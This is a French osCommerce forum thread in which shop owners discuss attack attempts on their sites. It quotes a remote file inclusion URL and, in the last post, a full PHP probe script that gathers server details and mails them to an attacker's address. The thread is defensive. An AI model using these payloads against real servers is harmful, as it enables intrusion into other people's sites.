Bienvenue invité ( Connexion | Inscription )
![]() ![]() |
15 Mar 2009, 14:03
Message
#1
|
|
|
Ceinture orange+ OSC Groupe : Membres Messages : 343 Inscrit : 27-February 08 Lieu : lune Membre no 20966 |
Bonjour à tous.
Voilà j'etait sur who online: Avec google qui etait là depuis 3H avec un ip 66.249.65.240. Normal. Quand tout d'un coup, avec la même session, connecter depuis 3h aussi, mais l'adresse ip à change: 94.126.44.72 et l'adresse ou il est est TRES bizarre: Code /catalog//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mercedesov Du coup part sécurité, je vite ajouter à htaccess: Code order allow,deny deny from 94.126.44.72 allow from all Vous en pensez quoi?? Ce message a été modifié par gotcha5832 - 28 Apr 2009, 06:00. -------------------- Osc-2.2-ms2-FR
Os : Linux 2.6.24.7-desktop-2mnb Version PHP : 5.2.5 (Zend : 2.2.0) Base de données : MySQL 5.0.51a Serveur HTTP : Apache/2.2.8 (Mandriva Linux/PREFORK-6.1mdv2008.1) |
|
|
16 Mar 2009, 09:03
Message
#2
|
|
![]() Ceinture marron OSC Groupe : Modérateurs Messages : 1819 Inscrit : 14-March 03 Lieu : Beaune (21200) Membre no 961 |
Il a essayé certainement un script. Le mieux quand tu vois des adresses de ce type c'est de l'essayer pour voir si ça donne quelque chose. Généralement, ça ne donne rien, donc tu es tranquille. Par précaution, tu as bien fait de mettre cette IP dans le htaccess.
-------------------- The hardest thing in this world is to live in it.
Force jaune devant, marron derrière J'ai touché le fond de la piscine Dans ton petit pull marine... |
|
|
16 Mar 2009, 11:53
Message
#3
|
|
|
Ceinture orange+ OSC Groupe : Membres Messages : 343 Inscrit : 27-February 08 Lieu : lune Membre no 20966 |
Je te remercie.
C'est ce que je voulais entendre. A vrai dire vu que c'est la première fois que je vois une attaque en live, j'ai peut être over réagit... Merci de ta réponse -------------------- Osc-2.2-ms2-FR
Os : Linux 2.6.24.7-desktop-2mnb Version PHP : 5.2.5 (Zend : 2.2.0) Base de données : MySQL 5.0.51a Serveur HTTP : Apache/2.2.8 (Mandriva Linux/PREFORK-6.1mdv2008.1) |
|
|
16 Mar 2009, 20:16
Message
#4
|
|
|
Ceinture orange+ OSC Groupe : Membres Messages : 346 Inscrit : 21-December 05 Membre no 8273 |
avec craltrack tu verrais tous les jours tu en as !
|
|
|
17 Mar 2009, 11:49
Message
#5
|
|
|
Ceinture orange OSC Groupe : Membres Messages : 254 Inscrit : 18-March 04 Lieu : à 20 Km du Havre Membre no 2148 |
Code <?php //================================= // // scan inb0x hotmail v3.0 // // coded by FilhOte_Ccs and LOST // re-c0d3d by delet // // //================================= // ini_set("max_execution_time",-1); set_time_limit(0); $user = @get_current_user(); $UNAME = @php_uname(); $SafeMode = @ini_get('safe_mode'); if ($SafeMode == '') { $SafeMode = "OFF"; } else { $SafeMode = " $SafeMode "; } $delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); $dados=("<b>Produto</b> = " . $UNAME . " <i>Seguran?a</i> = " . $SafeMode . " http://" . $delet . " Muito obrigado por comprar o hehe1 com: <u>delet</u>"); $email = "vulldoeds@gmail.com"; $assunto = "Teste rox das vull do edson!!!"; $email1 = "vulldoeds@gmail.com"; $headers = "From: <$email>\r\n"; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; if(mail($email1,$assunto,$dados,$headers)){ echo "Isso, ja foi!"; exit(); } else{ echo "N?o foi."; exit(); } ?> Voila ce que j'ai trouvé moi avec crawltrack, par contre si le code n'est pas autorisé merci de l'effacer car mes compétences me permettent pas de savoir si il est dangereux ou pas. Ton attaque : _SERVER[DOCUMENT_ROOT je l'ai eu aussi mais j'arrive pas a retrouver un lien valide sur les adresses que Crawltrack me donne. -------------------- MS2.2-RC1-FR W3C
Creload 6.0 SP1.2 RC2, Template Thema 5 |
|
|
![]() ![]() |
|
Version bas débit | Nous sommes le : 25th May 2013 - 01:16 |
| Ce site est déclaré auprès de la commision Nationale de l'Informatique et des Libertés (déclaration n°: 1043896) |